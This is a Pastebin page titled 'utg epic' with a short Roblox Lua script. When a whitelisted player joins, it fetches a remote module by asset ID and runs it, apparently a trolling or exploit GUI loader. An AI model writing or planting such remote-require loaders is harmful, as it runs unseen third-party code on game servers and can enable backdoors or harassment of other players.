Advertisement
Guest User

utg epic

a guest
Dec 22nd, 2019
904
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 0.23 KB | None | 0 0
  1. local allowed = {"your Name" , "Friend Name" , "Friend Name"}
  2. game.Players.PlayerAdded:Connect (function(player)
  3.     for i, v in pairs (allowed) do
  4.         if player.Name == v then
  5.             require(3146633195):Fire(player.Name)
  6.         end
  7.     end
  8. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement